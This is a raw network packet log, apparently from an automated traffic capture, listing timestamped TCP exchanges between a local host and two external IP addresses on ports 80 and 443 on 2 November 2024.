                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045825005 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045835972 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045846939 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045855045 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045862913 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045871973 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045876026 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045886040 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045888901 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045912027 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.045939922 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.046344042 CET63873443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.046366930 CET44363873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.046454906 CET63873443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.046751976 CET63873443192.168.2.4188.114.96.3
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.046766043 CET44363873188.114.96.3192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086612940 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086663961 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086678028 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086687088 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086704969 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086718082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086731911 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086735964 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086745977 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086751938 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086781025 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086806059 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086833954 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086843014 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086885929 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086921930 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086931944 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086941957 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086967945 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.086997986 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087076902 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087120056 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087131977 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087143898 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087153912 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087182999 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087212086 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087215900 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087292910 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087301970 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087326050 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087332964 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087336063 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087352991 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087359905 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087364912 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087374926 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087387085 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087434053 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087434053 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087472916 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087482929 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087495089 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087517023 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087532997 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087541103 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087541103 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087574005 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087577105 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087588072 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087616920 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087656975 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087668896 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087682962 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087693930 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087702036 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087713003 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087723970 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087733984 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087737083 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087747097 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087754011 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087790012 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087790012 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087802887 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087842941 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087848902 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087858915 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087868929 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087884903 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087929964 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087929964 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087933064 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087944031 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.087977886 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088012934 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088021994 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088038921 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088052034 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088053942 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088067055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088073015 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088078976 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088092089 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088110924 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088149071 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088191032 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088232040 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088243008 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088259935 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088270903 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088279963 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088284969 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088289976 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088304996 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088311911 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088323116 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088324070 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088334084 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088341951 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088347912 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088361025 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088382006 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088537931 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088547945 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088567972 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088577986 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088588953 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088589907 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088597059 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088608027 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088610888 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088619947 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088629961 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088639021 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088649035 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088651896 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088660002 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088690996 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088691950 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088803053 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088849068 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088856936 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088869095 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088880062 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088891983 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088916063 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088926077 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088934898 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088937044 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088951111 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088982105 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.088982105 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089039087 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089050055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089060068 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089071989 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089082956 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089087963 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089117050 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089145899 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089293003 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089303970 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089314938 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089342117 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089370966 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089373112 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089384079 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089426041 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089451075 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089468002 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089481115 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089498043 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089514971 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089520931 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089531898 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089560986 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089587927 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089762926 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089772940 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089790106 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089799881 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089809895 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089812994 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089839935 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089868069 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089911938 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089920998 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089956045 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.089984894 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.123425961 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.123486996 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.123497009 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.123538971 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166287899 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166297913 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166307926 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166325092 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166340113 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166351080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166357040 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166359901 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166376114 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166380882 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166388035 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166399002 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166410923 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166420937 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166424990 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166444063 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166449070 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166450024 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166454077 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166464090 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166475058 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166486025 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166486025 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166486025 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166498899 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166507959 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166515112 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166517019 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166528940 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166532040 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166538000 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166549921 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166554928 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166562080 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166579008 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166589022 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166595936 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166595936 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166598082 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166615009 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166636944 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166699886 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166711092 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166722059 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166734934 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166769028 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166778088 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166789055 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166799068 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166815996 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166827917 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166831970 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166842937 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166846037 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166853905 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166863918 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166867018 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166881084 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166891098 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166894913 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166913986 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166917086 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166929960 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166951895 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166956902 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166963100 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166973114 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.166996002 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167015076 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167016029 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167031050 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167042971 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167058945 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167058945 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167071104 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167081118 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167083979 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167083979 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167102098 CET6386280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167109013 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167119980 CET8063862185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:22.167130947 CET8063862185.215.113.16192.168.2.4
